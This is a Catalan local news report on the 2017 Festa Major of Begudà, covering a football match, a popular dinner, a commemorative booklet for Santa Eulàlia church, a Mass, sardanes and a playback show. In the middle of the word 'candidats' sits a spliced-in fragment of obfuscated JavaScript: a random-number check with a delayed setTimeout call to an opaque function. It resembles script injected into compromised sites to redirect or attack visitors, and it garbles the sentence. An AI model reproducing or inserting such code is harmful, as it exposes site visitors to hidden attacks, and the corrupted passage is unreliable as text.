Lluïda celebració a la Festa Major de Begudà

Comparteix-ho amb els teus amics:

Aquest passat cap de setmana, 29 i 30 de juliol, ha tingut lloc la Festa Major de Begudà.

El tret de sortida ha estat el dissabte a la tarda amb el partit de futbol de solters contra casats. A la mateixa hora també s’han celebrat els jocs infantils,el taller de papiroflèxia de Joan Paper, l’actuació dels Dum Dum Dum i berenar per a tothom. A les 9 del vespre s’ha celebrat el tradicional sopar popular, a l’aire lliure i amb més de 170 assistents, on s’han degustat productes de la terra en companyia dels amics, familiars i veïns del municipi. Abans de començar el ball amb el conjunt “Què tal” s’ha presentat el llibret commemoratiu dels 900 anys de la consagració de l’Església de Santa Eulàlia. En el decurs del ball s’ha informat que aquest any Begudà no disposarà d’Hereu i Pubilla, però des de la comissió s’espera que l’any vinent es pugui reprendre la representació amb nous candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidats del nucli de Begudà.

El diumenge 30 al matí s’ha celebrat la Missa concelebrada pel Bisbe de Girona, Mons. Francesc Pardo i a continuació s’ha fet l’entrega i presentació del llibret commemoratiu dels 900 anys de la consagració de l’Església de Santa Eulàlia i ball de la faràndula; al finalitzar l’actuació s’ha celebrat el vermut per a tothom.

A la tarda ha tingut lloc l’audició de sardanes amb la cobla Principal de Banyoles, patrocinat per SYSFEED i tot seguit, espectacle de fi de festa amb el grup de playback de Sant Joan les Fonts “Surti com Surti”, que ha aplegat més d’un centenar de persones per acomiadar aquesta festa major que ha gaudit d’un temps inmillorable.

310717 FESTA MAJOR BEGUDA

310717 FESTA MAJOR BEGUDA 2

310717 FESTA MAJOR BEGUDA 3

310717 FESTA MAJOR BEGUDA 5

310717 FESTA MAJOR BEGUDA 6

310717 FESTA MAJOR BEGUDA 7

Info i fotos: Ajunt. Sant Joan les Fonts

Comparteix-ho amb els teus amics: